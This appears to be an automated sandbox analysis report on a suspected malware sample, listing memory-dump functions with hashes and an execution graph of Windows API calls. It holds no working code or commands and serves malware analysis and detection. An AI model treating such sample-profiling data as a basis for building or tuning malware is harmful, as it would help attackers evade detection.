                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q
                                                • API String ID: 0-3120983240
                                                • Opcode ID: d94fa730b8ca013ebfcdb5c0446af82aa2eeba8248d8a306a69faa2016b0f387
                                                • Instruction ID: 6caf6afe622920373852f93ceeb4cdcf15e87f269ca67db6dc80d40b737d5fb0
                                                • Opcode Fuzzy Hash: d94fa730b8ca013ebfcdb5c0446af82aa2eeba8248d8a306a69faa2016b0f387
                                                • Instruction Fuzzy Hash: 73610A70E456098FD748DF6EF584699BFF2FFC4300B54C52AD4489B26AEB346D0A8B40
                                                Function 04F11AA0 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,$D
                                                • API String ID: 0-1313800889
                                                • Opcode ID: 6b289541decde5db2aacee8964ac5de288ffe21ea486eee7bbe43a11a2aa555f
                                                • Instruction ID: b15dad9d746b93a9c1c09678415b1bc8677d3ed163b599ea75e09a39e6e5b171
                                                • Opcode Fuzzy Hash: 6b289541decde5db2aacee8964ac5de288ffe21ea486eee7bbe43a11a2aa555f
                                                • Instruction Fuzzy Hash: 63318EB1D056188BEB18DF6B8D44699FAF7AFCC310F14C1BAC50CA6264EB341A85CE14
                                                Function 055091A2 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: _TQ
                                                • API String ID: 0-2248929430
                                                • Opcode ID: 2f28080ba376117de0b43ad389af46954b3686febc1c56527a5f2604b3d6de9a
                                                • Instruction ID: 14176964d482305904456cf241715956cbd785b60e2bd1374e18d14128cfb83d
                                                • Opcode Fuzzy Hash: 2f28080ba376117de0b43ad389af46954b3686febc1c56527a5f2604b3d6de9a
                                                • Instruction Fuzzy Hash: 68810A74A05208CFDB04DFA8E5587EEBBF2FB89305F10552AE40AA7296DB746D85CF40
                                                Function 05480040 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p
                                                • API String ID: 0-2181537457
                                                • Opcode ID: 49cc28694f5eda41681da31a9859904da3113d2aae9151f4be2e672054e791ca
                                                • Instruction ID: 31d001884b02c5077bc5fac54193a0d4f3ce903e5daeaf8b0fc02c517255de42
                                                • Opcode Fuzzy Hash: 49cc28694f5eda41681da31a9859904da3113d2aae9151f4be2e672054e791ca
                                                • Instruction Fuzzy Hash: 6D513371D01A588BE72CCF5B8D456DAFAF3AFC9341F14C1FA954CAA255EB700AC58E40
                                                Function 04F11A90 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D
                                                • API String ID: 0-2746444292
                                                • Opcode ID: 5c4fddd31cadb863699aca74858f6507c859a4ab44bea2cc6b71556b76696ba8
                                                • Instruction ID: 1efad5b04525f9d30bb6b877a00d80f45333b5bd17cb8e181dba49d7430d01a6
                                                • Opcode Fuzzy Hash: 5c4fddd31cadb863699aca74858f6507c859a4ab44bea2cc6b71556b76696ba8
                                                • Instruction Fuzzy Hash: 813181B1D056588BDB18CF6B9D54299FBF3AFC8300F18C1BA840CA6265DB340986CE14
                                                Function 05471D94 Relevance: .4, Instructions: 412COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 541ec9144ecde750eddcec27a4981ea35c05ddd3085053e472310a7ee9919602
                                                • Instruction ID: 6620dd6150b0e966a274544dc88cc90ed8753f189c6e2abe1c5200616a67ab78
                                                • Opcode Fuzzy Hash: 541ec9144ecde750eddcec27a4981ea35c05ddd3085053e472310a7ee9919602
                                                • Instruction Fuzzy Hash: 5EF15974B0461A8FCB48DFA9C594ABFFBB2FB88300F248529D55697381CB74E951CB80
                                                Function 04F137AE Relevance: .3, Instructions: 313COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 689daa112443166c605fd7eca80508098a70f777f07e244ce82e2750542cb5e1
                                                • Instruction ID: 86162c03a2718b50c2dcba0f27d295b9bbf40edbfe29c9a39a046390a10b3692
                                                • Opcode Fuzzy Hash: 689daa112443166c605fd7eca80508098a70f777f07e244ce82e2750542cb5e1
                                                • Instruction Fuzzy Hash: DD616AF3CB55301FE6E9103898EB0DB5BA0C631614BF5B93AE64171C26798DA70F9981
                                                Function 05508BA8 Relevance: .3, Instructions: 279COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7afa421e455db48c6370c2066847c7e110d1c5957f9536978ea26458b505017
                                                • Instruction ID: 7a43670585699b180cbe6ae4bc813b6647d0c53ccea7d8066d2f9b3d6992ed86
                                                • Opcode Fuzzy Hash: d7afa421e455db48c6370c2066847c7e110d1c5957f9536978ea26458b505017
                                                • Instruction Fuzzy Hash: 46C12A70E05208CFDB54DF69E488BEEBBB2FB49311F10946AD40AAB291DB746D85CF44
                                                Function 05508BB8 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f52a750aa8c274b183e35d110deea847ee40b2475a4417f2bad90a3fabd59ad0
                                                • Instruction ID: 24714b473e0ebbd66548558eb61e90c25dc9629903918fd729fbf70ed8cf5503
                                                • Opcode Fuzzy Hash: f52a750aa8c274b183e35d110deea847ee40b2475a4417f2bad90a3fabd59ad0
                                                • Instruction Fuzzy Hash: 90B10B70E05218CFDB54DF69E488BEDBBB2FB49311F10946AD409AB291CB746D85CF44
                                                Function 05508F43 Relevance: .2, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e331728a438d8ba2ee8e29664cf91211d2e030b0bb76bb2a06b4e5c0486dbf08
                                                • Instruction ID: 03735fade9bcb3727dac7a76fe8cb4cff352c6d5fc3cdbb044ab47012f30ce93
                                                • Opcode Fuzzy Hash: e331728a438d8ba2ee8e29664cf91211d2e030b0bb76bb2a06b4e5c0486dbf08
                                                • Instruction Fuzzy Hash: D6A1FB70E05208CFDB54DF69E488BADBBB2FB49311F10956AD40AAB292CB746D85CF44
                                                Function 00F150B8 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f18d6c3fc83ee1a87d72f0efe933e077da60d56928020da1d6365d8a9a4457b
                                                • Instruction ID: f624201162f16051e1fccb8d2ce9cc911e45902b27135973eab83fa2554fa4af
                                                • Opcode Fuzzy Hash: 0f18d6c3fc83ee1a87d72f0efe933e077da60d56928020da1d6365d8a9a4457b
                                                • Instruction Fuzzy Hash: 2F818D75A04616CFCB14CF98C480BEAF7B2FBC8710F25C26AC0269B605D374E985EB91
                                                Function 0572C858 Relevance: .2, Instructions: 191COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17147278c28d34cdc63a1975df4a966344c3b8cab3860d54509b8693d4d1ebbe
                                                • Instruction ID: 610037754c76469bc589752b305a7f8240b393531d3db9d1f12c8e93d6ec5127
                                                • Opcode Fuzzy Hash: 17147278c28d34cdc63a1975df4a966344c3b8cab3860d54509b8693d4d1ebbe
                                                • Instruction Fuzzy Hash: BF712770D15228DFDB25DFA9C844BADBBBABF99300F1480A9C40AA7251DB705D86EF40
                                                Function 05480006 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03e966649b2fff24c1a403e201ed1a666e8bd1c19df7d08c645c84007c6dce5b
                                                • Instruction ID: 9c62333ca0828888020b3a7ed0fd5ea4c11c195d65c23e5982875e1158023ac3
                                                • Opcode Fuzzy Hash: 03e966649b2fff24c1a403e201ed1a666e8bd1c19df7d08c645c84007c6dce5b
                                                • Instruction Fuzzy Hash: 98518271D05A588BD72DCF678D456DAFAF3AFC9300F08C1FA954CA6265EB7409868F40
                                                Function 0548D9B8 Relevance: .1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8351e3b9525f8fa1f6b1cbc3bffa969d09ad11335121679e594005d64052fe1d
                                                • Instruction ID: f6a11e4a22c206dc0e5547cd75a54339afa7486d09de48c489703d145e69b1c7
                                                • Opcode Fuzzy Hash: 8351e3b9525f8fa1f6b1cbc3bffa969d09ad11335121679e594005d64052fe1d
                                                • Instruction Fuzzy Hash: A141FFB4D05248DFDB14DFA9D984AEEBBF1BF09300F24906AE419AB390D7749845CF85
                                                Function 05508112 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f39ad8e47860236205e7967490d9627d55543a28f7726d7a929c411485cfc44
                                                • Instruction ID: 62c9504e5237b6005cf6cdea557d006f73957625af0265bd8fe99829ceb14659
                                                • Opcode Fuzzy Hash: 9f39ad8e47860236205e7967490d9627d55543a28f7726d7a929c411485cfc44
                                                • Instruction Fuzzy Hash: 5041EEB5D042589FCB00CFA9D584AEEFBF4BF49310F24946AE455B7240C738AA85CFA4
                                                Function 04F1807E Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e38345c577d068d9d5f8825e157b6bdf9d4419b609f88177948dfbe539d8bd4
                                                • Instruction ID: 4765b8a4057eff0609e224c0e588ad7e35ab60e3b26528b5ba3f248fa3046ca5
                                                • Opcode Fuzzy Hash: 8e38345c577d068d9d5f8825e157b6bdf9d4419b609f88177948dfbe539d8bd4
                                                • Instruction Fuzzy Hash: 35413171E05A588BEB1CCF6B8D506DEFAF3AFC8301F14D1BA841DAA265EB3015469F11
                                                Function 05508118 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e38fd3d52917189d0a853fd051fd49b36fd4a43d146a1c763f4d94135a0e23c2
                                                • Instruction ID: cda8c56a8c0caff138bec109cb2e8e0bc015ee6b8c0894120dd632bc6844cf7b
                                                • Opcode Fuzzy Hash: e38fd3d52917189d0a853fd051fd49b36fd4a43d146a1c763f4d94135a0e23c2
                                                • Instruction Fuzzy Hash: C141EEB5C042589FCB00CFA9D584AEEFBF4BF49310F24946AE415B7240C738AA85CFA4
                                                Function 055080D2 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b4bb049814e4ca605852a09fdad98da054a9a457530fee6e5f8735d09b3d5a6
                                                • Instruction ID: 037c1ede77be3ec3caa9d99499727a7b674130bc07525a74bd63fb1caef94a99
                                                • Opcode Fuzzy Hash: 4b4bb049814e4ca605852a09fdad98da054a9a457530fee6e5f8735d09b3d5a6
                                                • Instruction Fuzzy Hash: 0E310075D05208CFCB00CFA9E484BEEFBB0BF49314F14902AE445B7291C7389A85CBA4
                                                Function 04F10006 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9809c7958cc102056d3c22388473fecc04cfe7e4a371331519c62b59f4811a1
                                                • Instruction ID: 0a2ce59e44c87ad533c68841159d97f8a35d8e8d36d41efc5d42da6eaa83ace5
                                                • Opcode Fuzzy Hash: a9809c7958cc102056d3c22388473fecc04cfe7e4a371331519c62b59f4811a1
                                                • Instruction Fuzzy Hash: 9F3123B2D096548FEB19CF2B8C551DDBFB3AFC5300F08C0AAC449AA266EA340947DF11
                                                Function 0571001F Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5a218460c059d7ea8d42492f9a000bc7ee554b70ca08c4c39a62bf4eaeb6d975
                                                • Instruction ID: d15f3376ec0ff90ed39b16f37228547fd01564b2614e7c1ebea4f76140d27a57
                                                • Opcode Fuzzy Hash: 5a218460c059d7ea8d42492f9a000bc7ee554b70ca08c4c39a62bf4eaeb6d975
                                                • Instruction Fuzzy Hash: 4B312B70D046559FDB29CF6B885839DBBB3BFC9300F14C1FAC808AA255DB7509869F10
                                                Function 05710040 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d2a3f1617b6d4eefb15d061aa6cf21ed2f5fa97dc7f70d291f653ac3be5740a
                                                • Instruction ID: 2457c7621eebd9968286bbd737378831f09f9c95ffc707e51c37c6c6f077504b
                                                • Opcode Fuzzy Hash: 7d2a3f1617b6d4eefb15d061aa6cf21ed2f5fa97dc7f70d291f653ac3be5740a
                                                • Instruction Fuzzy Hash: 4821B871D04629DBEB28CFAB884469EFAF7BFC8300F14C1BAD40DA6254EB7409859F50
                                                Function 04F10040 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8c31325f5c8d0b18cb7ad7712407009c3a1721e5f6b80d06bcad6fdaa2f85ca
                                                • Instruction ID: eac11fe378cfc036f40061946af719bdb2053fe4a57784f89ad6d82c13bac212
                                                • Opcode Fuzzy Hash: d8c31325f5c8d0b18cb7ad7712407009c3a1721e5f6b80d06bcad6fdaa2f85ca
                                                • Instruction Fuzzy Hash: EF21C871E05618CBDB18CF6BC9006DDFAF7AFC9300F14C1AA840CA6224EB341A869F00
                                                Function 0571003B Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3941bcad5a25bd29b5bcc460bc858e32c530f7098440b97f042b1af600edad8a
                                                • Instruction ID: 2c5b24c56384c91aa286345f2b78377acebe2eeaf3360fa3ec7926abae1e3f8a
                                                • Opcode Fuzzy Hash: 3941bcad5a25bd29b5bcc460bc858e32c530f7098440b97f042b1af600edad8a
                                                • Instruction Fuzzy Hash: E721A971D046299BEB29CF6B8C5879EBAF7BFC4300F14C1BAD40CA6254DB7409869F10
                                                Function 04EF8D70 Relevance: 7.9, Strings: 6, Instructions: 404COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                • API String ID: 0-463314800
                                                • Opcode ID: 084ded8bab9fdfb4a88edf83122730b1edcaf2d44d6ec226aa2c34168e3663f5
                                                • Instruction ID: 9c1416cb2e60555fec03ccda10c743d56e3ac7af9a9caa7c77946b0fb15f0888
                                                • Opcode Fuzzy Hash: 084ded8bab9fdfb4a88edf83122730b1edcaf2d44d6ec226aa2c34168e3663f5
                                                • Instruction Fuzzy Hash: 0BD18F32A00105DFCB09DF68D944E99BBB6FF88314F0684E8E609AB236D735ED55DB50
                                                Function 05728FD8 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: '$(o]q$(o]q$\s]q
                                                • API String ID: 0-1896924805
                                                • Opcode ID: 0783bedeef4db1e0a63b3f27ccca7ce9b59f16d29d25f8973f5e2de93158e1bb
                                                • Instruction ID: c27c858d46111ea20f3ec57eb74311cbe73c963b69fb9d51ebb8004693964646
                                                • Opcode Fuzzy Hash: 0783bedeef4db1e0a63b3f27ccca7ce9b59f16d29d25f8973f5e2de93158e1bb
                                                • Instruction Fuzzy Hash: 7031F870D05229CFDB24CF29CD54BEDB7B6BB89300F0486EAD619A7290DB705A84DF45

                                                Execution Graph

                                                Execution Coverage:10.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:153
                                                Total number of Limit Nodes:17
                                                execution_graph 42185 6fd2e08 42186 6fd2e4e GetCurrentProcess 42185->42186 42188 6fd2ea0 GetCurrentThread 42186->42188 42191 6fd2e99 42186->42191 42189 6fd2edd GetCurrentProcess 42188->42189 42190 6fd2ed6 42188->42190 42192 6fd2f13 42189->42192 42190->42189 42191->42188 42193 6fd2f3b GetCurrentThreadId 42192->42193 42194 6fd2f6c 42193->42194 42008 30f0848 42009 30f0849 42008->42009 42010 30f091b 42009->42010 42015 30f1380 42009->42015 42019 6fd1d00 42009->42019 42023 6fd1d82 42009->42023 42029 6fd1cf0 42009->42029 42017 30f138c 42015->42017 42016 30f1484 42016->42009 42017->42016 42033 30f7ea8 42017->42033 42020 6fd1d05 42019->42020 42048 6fd1494 42020->42048 42025 6fd1d05 42023->42025 42028 6fd1d8a 42023->42028 42024 6fd1d57 42024->42009 42025->42024 42026 6fd1494 2 API calls 42025->42026 42027 6fd1d30 42026->42027 42027->42009 42028->42009 42030 6fd1d05 42029->42030 42031 6fd1494 2 API calls 42030->42031 42032 6fd1d30 42031->42032 42032->42009 42034 30f7eb2 42033->42034 42035 30f7ecc 42034->42035 42038 6fefa48 42034->42038 42043 6fefa38 42034->42043 42035->42017 42040 6fefa5d 42038->42040 42039 6fefc72 42039->42035 42040->42039 42041 6fefc98 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42040->42041 42042 6fefc89 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42040->42042 42041->42040 42042->42040 42045 6fefa48 42043->42045 42044 6fefc72 42044->42035 42045->42044 42046 6fefc98 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42045->42046 42047 6fefc89 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 42045->42047 42046->42045 42047->42045 42049 6fd149f 42048->42049 42052 6fd2c04 42049->42052 42051 6fd36b6 42051->42051 42053 6fd2c0f 42052->42053 42054 6fd3ddc 42053->42054 42056 6fd5a60 42053->42056 42054->42051 42057 6fd5a81 42056->42057 42058 6fd5aa5 42057->42058 42060 6fd5c10 42057->42060 42058->42054 42061 6fd5c1d 42060->42061 42063 6fd5c56 42061->42063 42064 6fd492c 42061->42064 42063->42058 42065 6fd4937 42064->42065 42067 6fd5cc8 42065->42067 42068 6fd4960 42065->42068 42067->42067 42069 6fd496b 42068->42069 42075 6fd4970 42069->42075 42071 6fd5d37 42079 6fdb060 42071->42079 42085 6fdb048 42071->42085 42072 6fd5d71 42072->42067 42078 6fd497b 42075->42078 42076 6fd6ed8 42076->42071 42077 6fd5a60 2 API calls 42077->42076 42078->42076 42078->42077 42081 6fdb091 42079->42081 42082 6fdb0dd 42079->42082 42080 6fdb09d 42080->42072 42081->42080 42091 6fdb2d8 42081->42091 42094 6fdb2c8 42081->42094 42082->42072 42087 6fdb091 42085->42087 42088 6fdb0dd 42085->42088 42086 6fdb09d 42086->42072 42087->42086 42089 6fdb2d8 2 API calls 42087->42089 42090 6fdb2c8 2 API calls 42087->42090 42088->42072 42089->42088 42090->42088 42098 6fdb318 42091->42098 42092 6fdb2e2 42092->42082 42095 6fdb2d8 42094->42095 42097 6fdb318 2 API calls 42095->42097 42096 6fdb2e2 42096->42082 42097->42096 42100 6fdb31d 42098->42100 42099 6fdb35c 42099->42092 42100->42099 42104 6fdb5c0 LoadLibraryExW 42100->42104 42105 6fdb5b3 LoadLibraryExW 42100->42105 42101 6fdb354 42101->42099 42102 6fdb560 GetModuleHandleW 42101->42102 42103 6fdb58d 42102->42103 42103->42092 42104->42101 42105->42101 42106 6fd3050 DuplicateHandle 42107 6fd30e6 42106->42107 42108 6fdd510 42109 6fdd578 CreateWindowExW 42108->42109 42111 6fdd634 42109->42111 42112 17ed030 42113 17ed048 42112->42113 42114 17ed0a2 42113->42114 42120 6fda46c 42113->42120 42129 6fdd6b7 42113->42129 42133 6fda445 42113->42133 42142 6fde818 42113->42142 42151 6fdd6c8 42113->42151 42121 6fda477 42120->42121 42122 6fde889 42121->42122 42124 6fde879 42121->42124 42171 6fde49c 42122->42171 42155 6fde9a0 42124->42155 42160 6fde9b0 42124->42160 42165 6fdea7c 42124->42165 42125 6fde887 42125->42125 42130 6fdd6c5 42129->42130 42131 6fda46c CallWindowProcW 42130->42131 42132 6fdd70f 42131->42132 42132->42114 42136 6fda455 42133->42136 42134 6fde889 42135 6fde49c CallWindowProcW 42134->42135 42138 6fde887 42135->42138 42136->42134 42137 6fde879 42136->42137 42139 6fdea7c CallWindowProcW 42137->42139 42140 6fde9b0 CallWindowProcW 42137->42140 42141 6fde9a0 CallWindowProcW 42137->42141 42139->42138 42140->42138 42141->42138 42143 6fde855 42142->42143 42144 6fde889 42143->42144 42146 6fde879 42143->42146 42145 6fde49c CallWindowProcW 42144->42145 42147 6fde887 42145->42147 42148 6fdea7c CallWindowProcW 42146->42148 42149 6fde9b0 CallWindowProcW 42146->42149 42150 6fde9a0 CallWindowProcW 42146->42150 42147->42147 42148->42147 42149->42147 42150->42147 42152 6fdd6ee 42151->42152 42153 6fda46c CallWindowProcW 42152->42153 42154 6fdd70f 42153->42154 42154->42114 42157 6fde9b1 42155->42157 42156 6fdea50 42156->42125 42175 6fdea68 42157->42175 42178 6fdea58 42157->42178 42162 6fde9c4 42160->42162 42161 6fdea50 42161->42125 42163 6fdea68 CallWindowProcW 42162->42163 42164 6fdea58 CallWindowProcW 42162->42164 42163->42161 42164->42161 42166 6fdea8a 42165->42166 42167 6fdea3a 42165->42167 42169 6fdea68 CallWindowProcW 42167->42169 42170 6fdea58 CallWindowProcW 42167->42170 42168 6fdea50 42168->42125 42169->42168 42170->42168 42172 6fde4a7 42171->42172 42173 6fdfcea CallWindowProcW 42172->42173 42174 6fdfc99 42172->42174 42173->42174 42174->42125 42177 6fdea79 42175->42177 42182 6fdfc20 42175->42182 42177->42156 42179 6fdea68 42178->42179 42180 6fdea79 42179->42180 42181 6fdfc20 CallWindowProcW 42179->42181 42180->42156 42181->42180 42183 6fde49c CallWindowProcW 42182->42183 42184 6fdfc3a 42183->42184 42184->42177

                                                Executed Functions

                                                Function 06FE2388 Relevance: 9.0, Strings: 6, Instructions: 1488COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: 10a61f88b03d15ad292216b2c88acc01808f7efb53bdb4d27f66dc6fecdd632e
